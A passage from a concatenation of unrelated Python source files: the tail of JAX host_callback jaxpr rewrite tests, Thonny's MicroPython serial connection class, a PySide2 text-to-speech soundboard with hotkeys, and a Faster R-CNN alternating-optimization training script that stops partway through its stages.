in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, api.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
serial_connection.py
|
import serial
from thonny.plugins.micropython.connection import MicroPythonConnection, ConnectionFailedException
import threading
import time
from serial.serialutil import SerialException
import logging
import platform
import sys
from textwrap import dedent
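# Serial-port implementation of MicroPythonConnection: writes in small delayed blocks
# and reads from the port on a background thread, publishing only complete UTF-8 chunks.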
class SerialConnection(MicroPythonConnection):
def __init__(self, port, baudrate, skip_reader=False):
super().__init__()
try:
self._serial = serial.Serial(port, baudrate=baudrate, timeout=None)
self._serial.dtr = 0
self._serial.rts = 0
except SerialException as error:
err_str = str(error)
if "FileNotFoundError" in err_str:
err_str = "port not found"
message = "Unable to connect to " + port + ": " + err_str
# TODO: check if these error codes also apply to Linux and Mac
if error.errno == 13 and platform.system() == "Linux":
# TODO: check if user already has this group
message += "\n\n" + dedent(
"""\
Try adding yourself to the 'dialout' group:
> sudo usermod -a -G dialout <username>
(NB! This needs to be followed by reboot or logging out and logging in again!)"""
)
elif "PermissionError" in message:
message += "\n\n" + dedent(
"""\
If you have serial connection to the device from another program,
then disconnect it there."""
)
elif error.errno == 16:
message += "\n\n" + "Try restarting the device."
raise ConnectionFailedException(message)
if skip_reader:
self._reading_thread = None
else:
self._reading_thread = threading.Thread(target=self._listen_serial, daemon=True)
self._reading_thread.start()
def write(self, data, block_size=255, delay=0.01):
# delay and block size taken from rshell
# https://github.com/dhylands/rshell/blob/master/rshell/pyboard.py#L242
for i in range(0, len(data), block_size):
block = data[i : i + block_size]
# self._log_data(b"[" + block + b"]")
size = self._serial.write(block)
assert size == len(block)
time.sleep(delay)
return len(data)
def _listen_serial(self):
"NB! works in background thread"
try:
data = b""
while True:
data += self._serial.read(1) # To avoid busy loop
if len(data) == 0:
self._error = "EOF"
# print("LISTEN EOFFFFFFFFFF")
break
data += self._serial.read_all()
self.num_bytes_received += len(data)
# don't publish incomplete utf-8 data
try:
data.decode("utf-8") # testing if data decodes
to_be_published = data
data = b""
except UnicodeDecodeError as e:
if e.start == 0:
                        # Invalid start byte, i.e. we have missed the first byte(s) of the codepoint.
                        # No use in waiting; output everything.
to_be_published = data
data = b""
else:
to_be_published = data[: e.start]
data = data[e.start :]
if to_be_published:
self._make_output_available(to_be_published)
except Exception as e:
self._error = str(e)
def incoming_is_empty(self):
return self._serial.in_waiting == 0 and super().incoming_is_empty()
def outgoing_is_empty(self):
return self._serial.out_waiting == 0
def reset_output_buffer(self):
self._serial.reset_output_buffer()
def close(self):
if self._serial is not None:
try:
self._serial.cancel_read()
if self._reading_thread:
self._reading_thread.join()
finally:
try:
self._serial.close()
self._serial = None
except Exception:
logging.exception("Couldn't close serial")
class DifficultSerialConnection(SerialConnection):
"""For hardening the communication protocol"""
def _make_output_available(self, data, block=True):
# output Thonny message marker as two parts
pos = data.find(b"<thonny>")
if pos > -1:
super()._make_output_available(data[: pos + 5], block=block)
time.sleep(0.1)
super()._make_output_available(data[pos + 5 :], block=block)
else:
super()._make_output_available(data, block=block)
def debug(*args, file=sys.stderr):
print(*args, file=file)
|
main.py
|
import sys
import os
import time
import threading
from PySide2 import QtWidgets, QtCore, QtGui, QtMultimedia
from PyUI import ui_main
import pyttsx3
import sounddevice as sd
import soundfile as sf
import keyboard
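# Text-to-speech soundboard: a PySide2 GUI that synthesizes text with pyttsx3, stores clips
# as WAV files, and plays them through a selectable output device, optionally via global hotkeys.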
def play(data, fs, device=None, id=0):
if device is None:
sd.play(data, fs)
else:
sd.play(data, fs, device=device)
print(f'process {id}')
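# Thread wrapper around sounddevice playback so a clip can be started without blocking the caller.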
class Player(threading.Thread):
def __init__(self, data, fs, device=None, id=0):
threading.Thread.__init__(self)
self.data = data
self.fs = fs
self.device = device
self.id = id
def run(self):
if self.device is None:
sd.play(self.data, self.fs)
else:
sd.play(self.data, self.fs, device=self.device)
print(f'process {self.id}')
# pyinstaller --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.dummy --hidden-import=pyttsx3.drivers.espeak --hidden-import=pyttsx3.drivers.nsss --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole --icon=icon.ico --name="Text to Mic by MaxGyverTech" main.py
# pyside2-uic UI/main.ui -o PyUI/ui_main.py
class MainWindow(QtWidgets.QMainWindow, ui_main.Ui_MainWindow):
def __init__(self):
super().__init__()
self.ui = ui_main.Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowTitle('TextToMic by MaxGyver')
self.setWindowIcon(QtGui.QIcon('res/icon.ico'))
self.setStyleSheet(open('res/main.qss', 'r').read())
# classes
self.engine = pyttsx3.init()
self.settings = QtCore.QSettings('PySoundpad', 'Settings')
self.ao = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo().defaultOutputDevice())
self.soundfile = QtCore.QFile()
self.s = QtMultimedia.QSound('')
self.proc1 = None
self.proc2 = None
# self.a1 = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo.defaultOutputDevice())
# self.a2 = QtMultimedia.QAudioOutput(QtMultimedia.QAudioDeviceInfo.availableDevices(QtMultimedia.QAudio.AudioInput)[4])
# sett
self.sounds_dir = 'sounds/'
self.key_bind_dir = 'sound_keys/'
self.var_dir = 'var/'
self.device = self.settings.value(f'{self.var_dir}device', 9)
self.voice = self.settings.value(f'{self.var_dir}voice', None)
self.debug = self.settings.value(f'{self.var_dir}debug', True)
# var
self.error_w = None
self.change_voice_window = None
# triggers
self.ui.playButt.clicked.connect(self.ev_play)
self.ui.saveButt.clicked.connect(self.ev_play_save)
self.ui.set_output.triggered.connect(self.change_output)
self.ui.set_voice.triggered.connect(self.change_voice)
self.ui.textEdit.textChanged.connect(self.ev_text_updated)
# init
os.makedirs('sounds', exist_ok=True)
self.update_list()
self.apply_voice(self.voice)
def ev_play(self):
text = self.ui.textEdit.toPlainText()
if not text == '':
self.record_text(self.ui.textEdit.toPlainText())
self.play_sound()
else:
self.play_sound()
def ev_play_save(self):
if self.ui.textEdit.toPlainText() == '':
return
file = self.ui.saveLine.text()
if file == '':
file = self.ui.textEdit.toPlainText()[:20]
self.record_text(self.ui.textEdit.toPlainText(), file=file)
self.play_sound(file=file)
self.update_list()
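    # A newline in the text box (i.e. pressing Enter) triggers playback and clears the field.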
def ev_text_updated(self):
text = self.ui.textEdit.toPlainText()
if '\n' in text:
self.ev_play()
self.ui.textEdit.clear()
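    # Plays either the scratch file 'sound.wav' or a named clip from the sounds directory
    # on the currently selected output device.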
def play_sound(self, file=None):
if file is None:
file = 'sound.wav'
else:
file = f'{self.sounds_dir}{file}.wav'
data, fs = sf.read(file)
# self.my_sd.stop()
# self.my_sd.play(file)
# self.tr1, self.tr2 = None, None
# self.tr1 = Player(data, fs, 9)
# self.tr2 = Player(data, fs, id=1)
# self.tr1.start()
# self.tr2.start()
# sd.play(data, fs)
# sd.wait()
        sd.play(data, fs, device=self.device)
self.s.play(file)
# self.soundfile.setFileName(file)
# self.soundfile.open(QtCore.QIODevice.ReadOnly)
# self.ao.start(self.soundfile)
def record_text(self, text, file=None):
if file is None:
file = 'sound.wav'
else:
file = f'{self.sounds_dir}{file}.wav'
self.engine.save_to_file(text, file)
# self.engine.say(text)
self.engine.runAndWait()
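    # Asks the user to pick a playback device; the choice is used by later sd.play(device=...) calls.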
def change_output(self):
# items = [str(i)+self.p.get_device_info_by_index(device_index=i).get('name') for i in range(
# self.p.get_device_count()) if self.p.get_device_info_by_index(device_index=i).get('maxOutputChannels') !=
# 0] print(items) devices = [] for i in range(self.p.get_device_count()): dev =
# self.p.get_device_info_by_index(device_index=i) if dev.get('maxOutputChannels') and dev.get('name') not in
# devices: devices.append(dev.get('name'))
devices = list(set(
[i.deviceName() for i in QtMultimedia.QAudioDeviceInfo.availableDevices(QtMultimedia.QAudio.AudioInput)]))
# devices = [i['name'] for i in sd.query_devices()]
item, ok = QtWidgets.QInputDialog().getItem(self, "Настройка выхода", "Выберите устройство", devices, 0, False)
if ok:
            # sd.query_devices(name) returns a single device-info dict, so the original
            # indexing and .hostapi() call would fail; map the name to a sounddevice index instead.
            matches = [idx for idx, dev in enumerate(sd.query_devices()) if dev['name'] == item]
            self.device = matches[0] if matches else self.device
def change_voice(self):
voices = self.engine.getProperty('voices')
index = 0
if self.voice is not None:
for i in range(len(voices)):
if voices[i].id == self.voice:
index = i
break
self.change_voice_window = VoiceSettings(voices, index, parent=self)
self.change_voice_window.show()
def apply_voice(self, voice):
if voice is not None:
self.engine.setProperty('voice', voice)
self.settings.setValue(f'{self.var_dir}voice', voice)
def update_list(self):
self.ui.soundList.clear()
        files = [file for file in os.listdir(self.sounds_dir) if
                 os.path.isfile(os.path.join(self.sounds_dir, file)) and file.endswith('.wav')]
for file in files:
key = self.settings.value(f'{self.key_bind_dir}{file.split(".")[0]}')
item = SoundItemWidget(file.split('.')[0], key, parent=self)
listItem = QtWidgets.QListWidgetItem(self.ui.soundList)
listItem.setSizeHint(item.sizeHint())
self.ui.soundList.addItem(listItem)
self.ui.soundList.setItemWidget(listItem, item)
def upd_shortcut(self, file, key):
self.settings.setValue(f'{self.key_bind_dir}{file}', key)
def debug_err(self, error, text):
if self.debug:
self.error_w = ErrorWindow(error, text)
self.error_w.show()
else:
print(error, text)
    def closeEvent(self, event):
        self.error_w = None
        event.accept()
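# One row of the clip list: shows the clip name, its hotkey binding (if any), and buttons
# to clear the hotkey or delete the clip.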
class SoundItemWidget(QtWidgets.QWidget):
def __init__(self, filename: str, key=None, parent: MainWindow = None):
super(SoundItemWidget, self).__init__(parent)
self.parent = parent
self.filename = filename
self.key = None
self.setObjectName('SoundItemWidget')
self.keyEdit = QtWidgets.QPushButton(key if key is not None else 'Задать сочетание клавиш')
self.keyEdit.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.keyEdit.adjustSize()
self.clear_but = QtWidgets.QPushButton(QtGui.QIcon('res/close.png'), '')
self.clear_but.clicked.connect(self.clear_key)
self.clear_but.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
        self.clear_but.setToolTip('очистить сочетание клавиш')
self.delete_but = QtWidgets.QPushButton(QtGui.QIcon('res/delete.png'), '')
self.delete_but.clicked.connect(self.delete_key)
self.delete_but.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.delete_but.setToolTip('удалить звук/текст')
self.key_layout = QtWidgets.QHBoxLayout()
self.key_layout.addWidget(self.keyEdit)
self.key_layout.addWidget(self.clear_but)
self.key_layout.addWidget(self.delete_but)
self.layout = QtWidgets.QHBoxLayout()
self.layout.addWidget(QtWidgets.QLabel(filename if len(filename)<20 else filename[:19]+'...'))
self.layout.addLayout(self.key_layout)
self.setLayout(self.layout)
self.setToolTip('даблкликни на меня')
if key is not None:
self.key = key
keyboard.add_hotkey(self.key, self.play_sound)
self.keyEdit.clicked.connect(self.key_change)
def clear_key(self):
self.keyEdit.setText('Задать сочетание клавиш')
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.key = None
self.parent.settings.remove(f'{self.parent.key_bind_dir}{self.filename}')
def delete_key(self):
os.remove(f'sounds/{self.filename}.wav')
self.parent.settings.remove(f'{self.parent.key_bind_dir}{self.filename}')
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.parent.update_list()
def key_change(self):
if self.key is not None:
keyboard.remove_hotkey(self.key)
self.keyEdit.setText('...')
self.keyEdit.setStyleSheet('border-width: 2px;')
self.key = keyboard.read_hotkey(suppress=False)
self.keyEdit.setStyleSheet('border-width: 0px;')
self.keyEdit.setText(self.key)
print(self.key)
keyboard.add_hotkey(self.key, SoundItemWidget.play_sound, args=[self])
self.parent.upd_shortcut(self.filename, self.key)
def play_sound(self):
self.parent.play_sound(self.filename)
def mouseDoubleClickEvent(self, event):
self.play_sound()
class VoiceSettings(QtWidgets.QWidget):
def __init__(self, voices, current_voice=0, parent=None):
super(VoiceSettings, self).__init__()
self.setStyleSheet(open('res/main.qss', 'r').read())
self.parent = parent
self.voices = voices
voice_list = [i.name for i in voices]
self.timer = QtCore.QTimer()
self.box = QtWidgets.QComboBox()
self.box.addItems(voice_list)
self.box.setCurrentIndex(current_voice)
self.play_butt = QtWidgets.QPushButton(QtGui.QIcon('res/play.png'), '')
self.box_layout = QtWidgets.QHBoxLayout()
self.box_layout.addWidget(self.box)
self.box_layout.addWidget(self.play_butt)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addLayout(self.box_layout)
self.setLayout(self.layout)
self.setGeometry(500, 500, 300, 100)
self.adjustSize()
self.setFixedSize(self.size())
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowCloseButtonHint)
self.box.currentIndexChanged.connect(self.save)
self.play_butt.clicked.connect(self.test_play)
self.timer.timeout.connect(self.return_title)
self.return_title()
def test_play(self):
self.parent.apply_voice(self.voices[self.box.currentIndex()].id)
self.parent.record_text('Привет это небольшой пример этого голоса')
data, fs = sf.read('sound.wav')
sd.stop()
sd.play(data, fs)
def save(self):
self.timer.start(2000)
self.setWindowTitle('Настройки голоса(сохранено)')
def return_title(self):
self.setWindowTitle('Настройки голоса')
class ErrorWindow(QtWidgets.QWidget):
def __init__(self, error, content):
super(ErrorWindow, self).__init__()
# TODO: set img
title = str(error)[8:len(str(error)) - 2]
text = str(content)
self.setFocus(QtCore.Qt.FocusReason.PopupFocusReason)
self.text_field = QtWidgets.QLabel(text)
self.text_field.setGeometry(0, 0, 300, 100)
self.text_field.setAlignment(QtCore.Qt.AlignTop)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.text_field)
self.setLayout(self.layout)
self.setGeometry(500, 500, 300, 100)
self.setWindowTitle(title)
self.adjustSize()
self.setFixedSize(self.size())
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowCloseButtonHint)
def excepthook(exc_type, exc_value, exc_tb):
window.debug_err(exc_type, exc_value)
def key_loop():
keyboard.wait()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
    key_tr = threading.Thread(target=key_loop, daemon=True)  # daemon so the thread doesn't block interpreter exit
key_tr.start()
# sys.excepthook = excepthook
app.exec_()
|
train_faster_rcnn_alt_opt.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 40000, 80000, 40000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
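# For example, with net_name='ZF' and the default cfg.MODELS_DIR this yields
# solver paths such as
#   <MODELS_DIR>/ZF/faster_rcnn_alt_opt/stage1_rpn_solver60k80k.pt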
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
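# Illustrative helper (an addition for clarity; the original script inlines this
# pattern for every stage below): run a stage function in a child process, read
# its single result dict from the multiprocessing queue, then join the process
# so the GPU memory held by pycaffe is released when the child exits.
def _run_stage(target, **stage_kwargs):
    queue = mp.Queue()
    stage_kwargs['queue'] = queue
    p = mp.Process(target=target, kwargs=stage_kwargs)
    p.start()
    result = queue.get()  # e.g. {'model_path': ...} or {'proposal_path': ...}
    p.join()
    return result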
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
    cfg.TRAIN.HAS_RPN = False           # not generating proposals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
    # queue for communicating results between processes
mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
